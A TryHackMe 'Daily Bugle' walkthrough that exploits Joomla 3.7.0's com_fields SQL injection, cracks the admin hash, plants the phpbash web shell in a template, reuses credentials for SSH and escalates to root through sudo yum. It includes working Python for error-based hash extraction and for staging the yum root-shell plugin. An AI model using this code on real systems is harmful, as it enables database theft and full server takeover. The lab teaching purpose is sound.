TryHackMe Walkthrough: "Daily Bugle" - Joomla Exploitation


Daily Bugle from TryHackMe (https://tryhackme.com/room/dailybugle) is another one of the many free offerings from TryHackMe.  Today's walkthrough will show you how to enumerate Joomla, exploit a vulnerability with a tool called Joomblah, get a browser-based shell with a PHP script called phpbash, and more.  So let's get to it!

Scanning

We get started like we always do, by investigating our target with Nmap.

 nmap 10.10.99.88

nmap -A -p22,80,3306 10.10.99.88

We have three ports open: SSH (22), a web server (80), and MariaDB (3306).  The version detection tells us the web server is Apache running PHP, and the http-generator header identifies the application as Joomla, a well-known Content Management System (CMS).  Now that we know what we are working with, let's enumerate!

Enumeration

Our first stop is the web server, which reveals a pretty basic website.

10.10.99.88 Daily Bugle Web Server

Additionally, let's check our Wappalyzer output.
Wappalyzer Output

We recover much of the same information the Nmap scan gave us, but still know little about the Joomla install itself.  Fortunately there is a tool in the apt repository called "joomscan" that gathers exactly that.
joomscan -u 10.10.99.88

Joomscan reports the Joomla version as 3.7.0, and lists some subdirectories (including /administrator) that we can investigate.  Let's research this Joomla version to see if there are any known vulnerabilities.

searchsploit joomla 3.7

Searchsploit shows that this version of Joomla is vulnerable to an unauthenticated SQL injection (the com_fields injection, CVE-2017-8917), but most of the results lean on SQLmap to exploit it.  We are going full "try harder" mode on this one and avoiding SQLmap, and luckily someone has already done the leg work and written a standalone tool.  Searching for Joomla 3.7 exploits turns up the following.
Joomblah.py on Github

Joomblah is a Python script that exploits this injection and dumps the usernames and password hashes stored in the Joomla users table.  So let's move on to the Exploitation section and get to work.

Exploitation

Now that we have discovered a tool that might help us, and we have researched what it does and how to use it, let's try it out.

python joomblah.py http://10.10.99.88

The syntax is simple enough, but the script errors out if you omit the http:// scheme from the URL.  Running it extracts the usernames and password hashes of the Joomla users, which we can use to log into the Joomla administrator panel (the /administrator subdirectory Joomscan found).  Joomla stores bcrypt hashes ($2y$...) rather than passwords, so we need to crack the hash first.  
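To show what Joomblah automates, here is an added example (not Joomblah's code and not part of the original post).  The injection point is the list[fullordering] parameter of com_fields, the same parameter the searchsploit entries hand to SQLmap, and the data comes back inside a MySQL XPATH error raised by updatexml().  The target address, the fake_joomla() responder and its secret string are constructed here so the script runs offline; against a real target the fetch callable would be something like requests.get(url).text.

```python
import re
from urllib.parse import parse_qs, urlencode, urlsplit

# MySQL puts at most 32 characters of the offending XPATH expression in the
# error text; the leading "~" marker uses one, so 31 characters of data leak
# per request and longer results have to be read in substr() slices.
CHUNK = 31
XPATH_ERR = re.compile(r"XPATH syntax error: '~(.*?)'", re.DOTALL)


def build_url(base, query, offset):
    """Wrap an attacker-chosen SELECT in the unsanitised list[fullordering]
    parameter of com_fields so the ORDER BY clause evaluates updatexml()."""
    sliced = f"(select substr(({query}),{offset},{CHUNK}))"
    params = {
        "option": "com_fields",
        "view": "fields",
        "layout": "modal",
        "list[fullordering]": f"updatexml(1,concat(0x7e,{sliced}),1)",
    }
    # urlencode() also turns the "#" of Joomla's #__ table prefix into %23,
    # which matters: a bare "#" would be read as a URL fragment and dropped.
    return f"{base.rstrip('/')}/index.php?{urlencode(params)}"


def leaked_slice(html):
    """Return the data reflected in the MySQL error page, or None."""
    m = XPATH_ERR.search(html)
    return m.group(1) if m else None


def extract(base, query, fetch):
    """Read the full result of `query` one 31-character slice at a time.
    `fetch(url) -> str` performs the HTTP GET (e.g. requests.get(url).text)."""
    out, offset = "", 1
    while True:
        piece = leaked_slice(fetch(build_url(base, query, offset)))
        if not piece:            # no error page or an empty slice: done
            break
        out += piece
        if len(piece) < CHUNK:   # a short slice means we reached the end
            break
        offset += CHUNK
    return out


# Joomla rewrites #__ to the real table prefix, so the prefix need not be known.
USERS_QUERY = "select concat(username,0x3a,password) from #__users limit 0,1"


def fake_joomla(secret):
    """Constructed stand-in for the vulnerable endpoint (no real server is
    contacted): it honours the injected substr() and reflects the XPATH error
    the way MySQL does, so extract() can be exercised offline."""
    def fetch(url):
        ordering = parse_qs(urlsplit(url).query)["list[fullordering]"][0]
        m = re.search(r"substr\(\(.*\),(\d+),(\d+)\)", ordering)
        off, length = int(m.group(1)), int(m.group(2))
        piece = secret[off - 1:off - 1 + length]
        return f"<h1>500</h1><p>XPATH syntax error: '~{piece}'</p>"
    return fetch


if __name__ == "__main__":
    # Constructed username:hash pair, not the room's real data.
    demo = fake_joomla("alice:$2y$10$" + "x" * 53)
    print(extract("http://10.10.99.88", USERS_QUERY, demo))
```

The 31-character limit is why tools like Joomblah issue several requests per row; a bcrypt hash alone is 60 characters.  The lazy regex stops at the first quote, so a value containing a single quote would be cut short; hex-encoding the result with hex() in the query avoids that when it matters.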

echo '<password hash>' > tocrack; john tocrack --wordlist=/root/Desktop/passes/rockyou.txt

John recognises the $2y$ hash as bcrypt on its own (--format=bcrypt forces it), and bcrypt is deliberately slow, so give rockyou.txt some time.  With the cracked password we log into http://10.10.99.88/administrator.
Joomla dashboard after login

The account is a Joomla Super User, which gives us free rein inside the CMS.  A little research on how to pivot from here shows that a Super User can edit a template's PHP files from the admin panel, so we can inject a PHP payload that gives us a shell on the underlying machine.  In Joomla 3 the editor lives under Extensions > Templates > Templates: pick the site template (Protostar on a default install), open its index.php, and you land on an editable text box containing the file's code.  We are going to replace this with our own code.  In this case I wanted to experiment with a PHP script I recently discovered called "phpbash" (https://github.com/Arrexel/phpbash), which essentially opens a bash-like terminal in the browser window.  Grab phpbash.php from the GitHub repository above, replace the contents of index.php with it, press Save, and then click the "Template Preview" button shown in the image below.  Bear in mind that overwriting index.php takes the public site down for everyone, so on a real engagement drop the shell into a new file instead, and restore the original when you are done.

Replacing current PHP code with our phpbash code, saving and clicking Template Preview

Hopefully you have done this correctly.  If you have, you should get a result that looks like the following.
phpbash: whoami and ls commands run

Now that we have command execution on the machine, we can run a few commands to test it.  phpbash is a semi-interactive web terminal, so some functionality (interactive programs, job control) is missing, but we can get by for now.  Of particular interest is Joomla's configuration.php in the web root, which holds the database credentials and often other secrets.  In this case, we've hit the jackpot.

cat configuration.php

There are some credentials here that we may be able to reuse.  We know that SSH is running on the machine, but we still need a username, and listing /home is the quickest way to find one.
cd /home; ls
That gives us a user (jjameson) and, with the database password from configuration.php, a candidate password.  Password reuse between services is common, so let's see if it works.

ssh jjameson@10.10.99.88

And we are successfully logged in.  Additionally, sudo -l shows us that we can run /usr/bin/yum as root via sudo.  A quick look at GTFObins shows that yum can be used to escalate privileges to root, because it will happily load a plugin from a configuration file we control.
Yum results on GTFObin

We simply copy the entire contents of section (b) of the GTFObins entry (the custom-plugin method), paste them into the terminal, and run them.  Doing so drops us into a root shell!

Yum privilege escalation to root
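What the pasted GTFObins recipe actually does, as an added Python example (not the page's own code and not the GTFObins snippet itself): a sudo -l parser that spots the rule, and a function that stages the same three files the (b) section creates.  yum lets an unprivileged caller choose the configuration file with -c, that file sets pluginpath to a directory we own, and the plugin's init_hook() runs inside the root yum process before any package work happens.  The sudo -l output, hostname and user below are constructed; the script writes the files and returns the command but does not run yum.

```python
import os
import re
import tempfile

# Rule lines look like "    (ALL) NOPASSWD: /usr/bin/yum, /usr/bin/less".
SUDO_RULE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+?)\s*$"
)

# Constructed sample of `sudo -l` output for the example; not captured output.
SAMPLE_SUDO_L = """\
Matching Defaults entries for jjameson on dailybugle:
    !visiblepw, always_set_home, match_group_by_gid, env_reset

User jjameson may run the following commands on dailybugle:
    (ALL) NOPASSWD: /usr/bin/yum
"""


def parse_sudo_l(text):
    """Turn the rule lines of `sudo -l` output into (runas, nopasswd, cmd)
    tuples; comma-separated commands on one rule line are split up."""
    rules = []
    for line in text.splitlines():
        m = SUDO_RULE.match(line)
        if not m:
            continue
        nopasswd = "NOPASSWD:" in m.group("tags")
        for cmd in m.group("cmds").split(","):
            rules.append((m.group("runas").strip(), nopasswd, cmd.strip()))
    return rules


# The three files from the GTFObins yum entry, option (b).  The main config
# enables plugins and points both plugin directories at our own directory.
YUM_CONF = "[main]\nplugins=1\npluginpath={d}\npluginconfpath={d}\n"
PLUGIN_CONF = "[main]\nenabled=1\n"
# yum calls init_hook() right after importing the plugin, still running as
# root under sudo, so exec'ing a shell there hands us a root shell.
PLUGIN_PY = (
    "import os\n"
    "import yum\n"
    "from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE\n"
    "requires_api_version = '2.1'\n"
    "def init_hook(conduit):\n"
    "    os.execl('/bin/sh', '/bin/sh')\n"
)


def stage_yum_plugin(workdir=None):
    """Write the config, plugin config and plugin into a directory we own and
    return (directory, command to run).  Nothing is executed here."""
    d = workdir or tempfile.mkdtemp()
    for name, body in (("x", YUM_CONF.format(d=d)),
                       ("y.conf", PLUGIN_CONF),
                       ("y.py", PLUGIN_PY)):
        with open(os.path.join(d, name), "w") as fh:
            fh.write(body)
    return d, f"sudo yum -c {d}/x --enableplugin=y"


def plan(sudo_l_output, workdir=None):
    """Return the staged escalation if yum may be run as root without a
    password, otherwise None."""
    for runas, nopasswd, cmd in parse_sudo_l(sudo_l_output):
        as_root = runas.split(":")[0].strip() in ("ALL", "root")
        if nopasswd and as_root and os.path.basename(cmd) == "yum":
            return stage_yum_plugin(workdir)
    return None


if __name__ == "__main__":
    staged = plan(SAMPLE_SUDO_L)
    print(staged[1] if staged else "no yum NOPASSWD rule found")
```

The plugin file name (y.py) must match the --enableplugin argument and the plugin config name (y.conf); that is the detail that most often goes wrong when the recipe is retyped by hand.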

You can grab your user and root flags from here, submit those in the THM dashboard, and complete the room.  Congratulations!

Final Thoughts

Those who know me know that I'm not the biggest fan of web app pentesting and challenges like this.  Daily Bugle wasn't the typical challenge I would loathe, however, and despite being rated insane in THM, I found it pretty straightforward.  I hope you've all learned something today and enjoyed this walkthrough.  I'll see you again soon!
